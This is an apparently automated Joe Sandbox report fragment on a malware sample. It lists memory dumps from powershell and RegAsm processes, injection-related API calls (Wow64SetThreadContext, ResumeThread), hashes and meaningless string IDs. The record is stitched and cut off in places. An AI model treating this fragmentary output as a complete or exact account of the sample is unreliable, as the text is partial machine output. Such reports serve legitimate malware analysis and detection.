                                                                                                                                    control_flow_graph 222 517fc20-517fc80 224 517fc97-517fcdf Wow64SetThreadContext 222->224 225 517fc82-517fc94 222->225 227 517fce1-517fce7 224->227 228 517fce8-517fd34 224->228 225->224 227->228
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 0517FCCF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1713531774.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_5170000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                    • Opcode ID: 28838df06c1e7bd98797851bfbe427d47233b72395c11de7d0f71ec80a39dbde
                                                                                                                                    • Instruction ID: 5385f72c1e45c4a6f459f741ecd2d2fd7feb24eac763b33a77fc80aa4937088a
                                                                                                                                    • Opcode Fuzzy Hash: 28838df06c1e7bd98797851bfbe427d47233b72395c11de7d0f71ec80a39dbde
                                                                                                                                    • Instruction Fuzzy Hash: 8531BCB5D012589FCB10CFA9D984AEEFBF0BF49320F14842AE415B7250C738A985CF54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 233 517fb30-517fbbe ResumeThread 236 517fbc7-517fc09 233->236 237 517fbc0-517fbc6 233->237 237->236
                                                                                                                                    APIs
                                                                                                                                    • ResumeThread.KERNELBASE(?), ref: 0517FBAE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1713531774.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_5170000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: f085f1ada9492582a9f56c76535ad3373aa0aa6c9bfdd27f71598387ad79922f
                                                                                                                                    • Instruction ID: 61b3eecd5f0215c1347cf9c022727b9bb18b388ec18f52f47663859348cc288d
                                                                                                                                    • Opcode Fuzzy Hash: f085f1ada9492582a9f56c76535ad3373aa0aa6c9bfdd27f71598387ad79922f
                                                                                                                                    • Instruction Fuzzy Hash: 4D31ACB5D012589FCF14CFA9D584ADEFBB5AF49320F14942AE815B7310C735A941CF94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1713093592.000000000372D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0372D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_372d000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: eb4ca50e8b83c355454ebaf8e0dae571b201821b515dae36260e9ce1f469b405
                                                                                                                                    • Instruction ID: 33727e8c51514f2662c42806c8f27448f7611cb1c2f5e29e215bf4732fbde171
                                                                                                                                    • Opcode Fuzzy Hash: eb4ca50e8b83c355454ebaf8e0dae571b201821b515dae36260e9ce1f469b405
                                                                                                                                    • Instruction Fuzzy Hash: 14012B311083189AE730CA2ACD84767FF9CDF41324F0CC46AEC684F166C279D841C6B1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1713093592.000000000372D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0372D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_372d000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 088a74286d0cab81cc9754c6f992b0d952f5b79d053416bae579e33b68895ff7
                                                                                                                                    • Instruction ID: 34eaacb2c21eb8630af2766f1c41d6dcbe2985c4b0a4d207ebcf24ce2bdd4f49
                                                                                                                                    • Opcode Fuzzy Hash: 088a74286d0cab81cc9754c6f992b0d952f5b79d053416bae579e33b68895ff7
                                                                                                                                    • Instruction Fuzzy Hash: 3D22D131A0020A9FDB55DF68D880B9EBBF2FF84310F558569E905DB261EB31EC85CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9d4508c073b0ffc45812fefa764aa23be62d657775cdcf09e888b5d51476e2c8
                                                                                                                                    • Instruction ID: 37bc2f1f57f3c2a6ba1597ed51fc28ad6c2da01df556e5622d8c49ed3f8f6047
                                                                                                                                    • Opcode Fuzzy Hash: 9d4508c073b0ffc45812fefa764aa23be62d657775cdcf09e888b5d51476e2c8
                                                                                                                                    • Instruction Fuzzy Hash: 88221374901229DFDB65DF65C958BE9BBB2FF89300F0084E9D509AB2A0CB359E84CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 435da210aefd13c8c4b19745d9959bf00a5dcd952c9b405f56a57d1933436fae
                                                                                                                                    • Instruction ID: dedb16d73abf2157e885d070b8331764963eb56ee2384f49171fc2b6b6c3faa0
                                                                                                                                    • Opcode Fuzzy Hash: 435da210aefd13c8c4b19745d9959bf00a5dcd952c9b405f56a57d1933436fae
                                                                                                                                    • Instruction Fuzzy Hash: 7DE1E7B4E01219DFDB14DFA9C884B9DFBB2BF88304F2481A9D419AB355DB30A985CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 47223a0df806c680bdf51eed1c4c67c01fd57b71242c5154d3f928bd0925845b
                                                                                                                                    • Instruction ID: 5b1b008f274386ccc619a5a3d1fd3350fe088429deda77dfed6c14a509da8cb8
                                                                                                                                    • Opcode Fuzzy Hash: 47223a0df806c680bdf51eed1c4c67c01fd57b71242c5154d3f928bd0925845b
                                                                                                                                    • Instruction Fuzzy Hash: 5ED1D334900318CFCB58EFB4D854A9DBBB2FF8A301F1081A9D55AAB654DB319986CF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a8c927fab86bc681859c27526b016c7e30510319363843e3987faefcd3d8dede
                                                                                                                                    • Instruction ID: 8eb563490fdc4a6f8ac2efc547b7e646246700b23e8d5deb502f3c1bbc9cdac7
                                                                                                                                    • Opcode Fuzzy Hash: a8c927fab86bc681859c27526b016c7e30510319363843e3987faefcd3d8dede
                                                                                                                                    • Instruction Fuzzy Hash: A4D1C374A00318CFCB58EFB4D854A9DBBB2FF8A301F1085A9D51AAB654DB319985CF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d2876a61c5cd051c00b39b6a7b4f18b740314aede2321722536ca5a1ca1e6990
                                                                                                                                    • Instruction ID: c18964b38698507f42d29b3b6a9253d3b5ec32d7bb2631ac764c8dd6f1f6df5a
                                                                                                                                    • Opcode Fuzzy Hash: d2876a61c5cd051c00b39b6a7b4f18b740314aede2321722536ca5a1ca1e6990
                                                                                                                                    • Instruction Fuzzy Hash: 3EC1B474E04219CFDB14DFA9C990A9DBBB2FF89300F14D1AAD409AB355DB30A986CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dd980122abd19f1c204a3a79fa1f755f6aa8760c461e7935002a6817b29c0984
                                                                                                                                    • Instruction ID: fccf601442f9352f5afca0ca1b6cac7ba89b1ba1a2886147225cf0539c31d3c7
                                                                                                                                    • Opcode Fuzzy Hash: dd980122abd19f1c204a3a79fa1f755f6aa8760c461e7935002a6817b29c0984
                                                                                                                                    • Instruction Fuzzy Hash: 7751A874E002198BEB18CFAAD950B9DFBB7BFC8300F14C1A9941DAB359DB3059858F50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                    • API String ID: 0-3886637785
                                                                                                                                    • Opcode ID: bfc5b07815a8bdc46045591c7715e1527471ff0fee87ed12dc704619f0c7db3c
                                                                                                                                    • Instruction ID: f24d3d43cc040b7cded5415d8b5f6888dc5874c589e2dc910c2427b635f9ab08
                                                                                                                                    • Opcode Fuzzy Hash: bfc5b07815a8bdc46045591c7715e1527471ff0fee87ed12dc704619f0c7db3c
                                                                                                                                    • Instruction Fuzzy Hash: BA82DC34A4020A9FDB48EF65E995ADDBBB2FB84304F1045ADD049AB368DF305D8ACF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-2449488485
                                                                                                                                    • Opcode ID: 8e11e470f5f8a248ca4ffa824d35a46bede8dfcac90a5f469dd2d5417d8d0a88
                                                                                                                                    • Instruction ID: 04c695eda8510cb0c15dc509a45015ef0243cf0758153595f82dc5bb52618f9f
                                                                                                                                    • Opcode Fuzzy Hash: 8e11e470f5f8a248ca4ffa824d35a46bede8dfcac90a5f469dd2d5417d8d0a88
                                                                                                                                    • Instruction Fuzzy Hash: DA22CF30B002199FDB55DB69C858A6EBBF7FF89704B10846AE606CB3A5CB75DC01CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (_^q$(_^q$(_^q$(_^q$(_^q$(_^q$(_^q$(_^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-441867370
                                                                                                                                    • Opcode ID: c2e85c780cdae7263ca6aaf56b75467ec43441d884b92cb043fb337cfdf53076
                                                                                                                                    • Instruction ID: 4b939ac88ef4c16a80bf754b70e6136a17ce46ea7b4e2b70a14e9f29bf26a076
                                                                                                                                    • Opcode Fuzzy Hash: c2e85c780cdae7263ca6aaf56b75467ec43441d884b92cb043fb337cfdf53076
                                                                                                                                    • Instruction Fuzzy Hash: 0B625C74A002199FDB15EFB8D850BADBBB6FF88300F1045A9D105AB368DB35AE45CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-2392861976
                                                                                                                                    • Opcode ID: c8801939347328a316d888792509b5d51a0f325acde7933f2d3bf796bb4fb4b3
                                                                                                                                    • Instruction ID: 2ba1fbf47e8f5401a8035dea1c64b04d6b2fed2d296f22665363bce7a057833b
                                                                                                                                    • Opcode Fuzzy Hash: c8801939347328a316d888792509b5d51a0f325acde7933f2d3bf796bb4fb4b3
                                                                                                                                    • Instruction Fuzzy Hash: B2C1F530B002289FDB949BA4C858A7E7BE6FF89B04F14846AD642CB3A5DF75DC05C791
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Hbq$Hbq$LR^q
                                                                                                                                    • API String ID: 0-2893092976
                                                                                                                                    • Opcode ID: e09e8d0dd85cac737e9508b4bbcf3cf3965fe01b433473204264bb9e83dfd899
                                                                                                                                    • Instruction ID: d851ef10b7175cb03b06942e967d484907d88903b3c37bd909843fa325fc95ed
                                                                                                                                    • Opcode Fuzzy Hash: e09e8d0dd85cac737e9508b4bbcf3cf3965fe01b433473204264bb9e83dfd899
                                                                                                                                    • Instruction Fuzzy Hash: 5D7133B1B04266EFDB19DB75881027F7BF2AF85201F18807EE566CB281EB34C901CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `Q^q$`Q^q$`Q^q
                                                                                                                                    • API String ID: 0-846367443
                                                                                                                                    • Opcode ID: 16410b0cf80717cd3a805bc806e285312b87205438ceb2e1548ebe12475e7606
                                                                                                                                    • Instruction ID: 775257eaede68ed1c8168411a6c7a4d21735fd2ba132b9cf71ced1edf8ba125e
                                                                                                                                    • Opcode Fuzzy Hash: 16410b0cf80717cd3a805bc806e285312b87205438ceb2e1548ebe12475e7606
                                                                                                                                    • Instruction Fuzzy Hash: 5F21DA31F002659FDF1AAB74DC057BE7AA6FB44B04F15005ED206AF280CBB0594587D6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $^q$k Xm^
                                                                                                                                    • API String ID: 0-3169001012
                                                                                                                                    • Opcode ID: 9beba44a62f8026d7fc7898ef12bd129f08a6670f51cf9de8ca19d50f12f6ef6
                                                                                                                                    • Instruction ID: 17a71625dfd923883514926bd4172acbd5ffbc366d99014b7825f83efc6fadbc
                                                                                                                                    • Opcode Fuzzy Hash: 9beba44a62f8026d7fc7898ef12bd129f08a6670f51cf9de8ca19d50f12f6ef6
                                                                                                                                    • Instruction Fuzzy Hash: 98E16F34F402198FCB54DF69C9849AEBBF6BF88700B258169D906EB365DB31DC41CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (&^q$(bq
                                                                                                                                    • API String ID: 0-1294341849
                                                                                                                                    • Opcode ID: 897f0f99c021f47c78ca7a781fa55614d9b5b4cf95503c3570beeab14d983749
                                                                                                                                    • Instruction ID: 3e988d08e3d1c84d53b1120edfcf3cd3c395e8f298019eb8505408e070755a94
                                                                                                                                    • Opcode Fuzzy Hash: 897f0f99c021f47c78ca7a781fa55614d9b5b4cf95503c3570beeab14d983749
                                                                                                                                    • Instruction Fuzzy Hash: BE515D71F0021A9FDB15EFA9C85069EBAF6AFC4640F248529D416AB380DE34AD02CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: xbq$xbq
                                                                                                                                    • API String ID: 0-4275011135
                                                                                                                                    • Opcode ID: 90b5a1858b25b6f5299eaf9adbfdf8968a88b2d1865b0e228840a8904daae60a
                                                                                                                                    • Instruction ID: 0ccf795cbb83a031df935ce71aafe8e5f446db558e525382cc4e1c15719865fa
                                                                                                                                    • Opcode Fuzzy Hash: 90b5a1858b25b6f5299eaf9adbfdf8968a88b2d1865b0e228840a8904daae60a
                                                                                                                                    • Instruction Fuzzy Hash: 4B513A71600206AFC755EB78E96955EBBE2FF812007108A2DC1478B7A5DF35A94ACBC1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Hbq$LR^q
                                                                                                                                    • API String ID: 0-1310586311
                                                                                                                                    • Opcode ID: bce70f15d0fca4b2d8e5cdbd0182b6584de09dbda39bcc84f27765d567a54a6c
                                                                                                                                    • Instruction ID: 4bce88b344546d5095f461c944dd09cb0dc8bcfb249ae9b9453fbf33d4d5e30e
                                                                                                                                    • Opcode Fuzzy Hash: bce70f15d0fca4b2d8e5cdbd0182b6584de09dbda39bcc84f27765d567a54a6c
                                                                                                                                    • Instruction Fuzzy Hash: 3331F1F1A04226EFCB599F748D106BF7BF2BF81201F24846ED562DB290EA348901C792
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4'^q
                                                                                                                                    • API String ID: 0-2697143702
                                                                                                                                    • Opcode ID: b1970a5e502f97b752a418700cb97e0c06c9c43af10c62b0a8fb7457837ab73a
                                                                                                                                    • Instruction ID: ae33341c40f36b7606512179ac27b6a313e2dde8a219d8b60d9c418befe688c5
                                                                                                                                    • Opcode Fuzzy Hash: b1970a5e502f97b752a418700cb97e0c06c9c43af10c62b0a8fb7457837ab73a
                                                                                                                                    • Instruction Fuzzy Hash: A7210230B483148FC719AB39941866E7BDBBFC5350B14497DD60ACBB94DE70DC0A8792
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4'^q
                                                                                                                                    • API String ID: 0-2697143702
                                                                                                                                    • Opcode ID: a92efc27c8281e651969fa1494025a3d160c711bf27917ff92cec6928b50e41f
                                                                                                                                    • Instruction ID: 5c5054253fb717d2a38042a906bd011954662e171f7e4f0829602eafa0d5514b
                                                                                                                                    • Opcode Fuzzy Hash: a92efc27c8281e651969fa1494025a3d160c711bf27917ff92cec6928b50e41f
                                                                                                                                    • Instruction Fuzzy Hash: 21017B3144D3404FC316A739A851485BFD6FE8215034048AED18ACFA66DB64E90AC372
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $^q$$^q
                                                                                                                                    • API String ID: 0-355816377
                                                                                                                                    • Opcode ID: 6dab6741e2134fbc71fd75c7250d205f06d74f08f39af94ae96d60ab5aa94f8d
                                                                                                                                    • Instruction ID: cc212ac670201f99ccf76f5b14d6f2e9a44b1bb1fff4cacdda85bf449f6ccc1b
                                                                                                                                    • Opcode Fuzzy Hash: 6dab6741e2134fbc71fd75c7250d205f06d74f08f39af94ae96d60ab5aa94f8d
                                                                                                                                    • Instruction Fuzzy Hash: D0F097B0B003189FC338C724900434A3BF0BB89210F14182EC581CF302DBB8EC018781
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: + Xm^
                                                                                                                                    • API String ID: 0-1740075132
                                                                                                                                    • Opcode ID: dcdb49f05b559e170c2826d64f3233edf3772cb7298b2d107b17ca82a91a8808
                                                                                                                                    • Instruction ID: 5477d211b1de17ae1dd6ccd70c7aba13af462ccebe29eccf2d4f3134ae87996f
                                                                                                                                    • Opcode Fuzzy Hash: dcdb49f05b559e170c2826d64f3233edf3772cb7298b2d107b17ca82a91a8808
                                                                                                                                    • Instruction Fuzzy Hash: C1122934B006058FDB55DF29C584A6EBBF2BF89304B1684A9E906DB376DB30EC85CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: )lPj
                                                                                                                                    • API String ID: 0-2859456766
                                                                                                                                    • Opcode ID: aff671ab22b535f4ef0c4148e2a91b6e2737bcfe928841b818da32573d7e5259
                                                                                                                                    • Instruction ID: 4305dd2ff24579c10ab1221db07ffa3fef06d401b4cdc009c558709ec85189cb
                                                                                                                                    • Opcode Fuzzy Hash: aff671ab22b535f4ef0c4148e2a91b6e2737bcfe928841b818da32573d7e5259
                                                                                                                                    • Instruction Fuzzy Hash: C2029C307403289FDB549F64C864A6EBBF2FB89704F108959D6029B3A1CFB6ED058BD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: d
                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                    • Opcode ID: abfdc20650a1a1ea2a040c6f3f934a13c6db0086b4e76c659b33fd3b2be1eb1c
                                                                                                                                    • Instruction ID: f2f638a68c97d5cc8f049498a14e8fd6325d0e99ac65d97b92be5985ff7a469b
• Opcode Fuzzy Hash: abfdc20650a1a1ea2a040c6f3f934a13c6db0086b4e76c659b33fd3b2be1eb1c
• Instruction Fuzzy Hash: E5C16E34600606CFCB65CF28C58096ABBF2FF89310B16CA99D95ADB665D730FC46CB91
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
